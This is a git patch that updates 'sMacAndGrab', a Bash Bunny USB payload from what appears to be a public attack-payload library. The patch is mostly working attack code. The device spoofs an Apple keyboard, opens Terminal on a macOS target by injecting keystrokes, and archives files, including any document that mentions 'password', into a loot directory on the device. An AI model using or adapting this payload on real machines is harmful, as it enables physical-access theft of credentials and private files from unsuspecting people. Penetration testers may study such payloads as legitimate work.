From ca9e53c5a8d053eaa7ab144cd447f50eb89f93c7 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Wed, 26 Apr 2017 17:04:38 -1000 Subject: [PATCH] updates sMacAndGrab for bashbunny fw1.1 (#202) --- .../library/exfiltration/SmacAndGrab/payload.txt | 13 ++++--------- payloads/library/exfiltration/SmacAndGrab/readme.md | 2 +- 2 files changed, 5 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/SmacAndGrab/payload.txt b/payloads/library/exfiltration/SmacAndGrab/payload.txt index 8ac0da0e..a78f1fc5 100644 --- a/payloads/library/exfiltration/SmacAndGrab/payload.txt +++ b/payloads/library/exfiltration/SmacAndGrab/payload.txt @@ -3,14 +3,14 @@ # Title: sMacAndGrab # Author: audibleblink # Target: macOS -# Version: 1.1 +# Version: 1.2 # # Backup a list of files from macOS # # Yellow (blinking)...Attacking # Green...............Finished -LED G R 500 +LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E # make the loot directory on the BashBunny @@ -50,16 +50,11 @@ files_to_copy=( "\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET ) -QUACK GUI SPACE -QUACK DELAY 1000 -QUACK STRING terminal -QUACK ENTER +QUACK RUN OSX terminal QUACK DELAY 4000 # the more files in $files to copy, the longer tar will take to compress # one-liner because we want the move command to wait for tar to finish QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal QUACK ENTER -# sync the filesystem -sync -LED G +LED FINISH diff --git a/payloads/library/exfiltration/SmacAndGrab/readme.md b/payloads/library/exfiltration/SmacAndGrab/readme.md index 181d8d7b..2a9714ee 100644 --- a/payloads/library/exfiltration/SmacAndGrab/readme.md +++ b/payloads/library/exfiltration/SmacAndGrab/readme.md @@ -1,7 +1,7 @@ # sMacAndGrab Author: audibleblink -Version: Version 1.1 +Version: Version 1.2 Target: macOS ## Description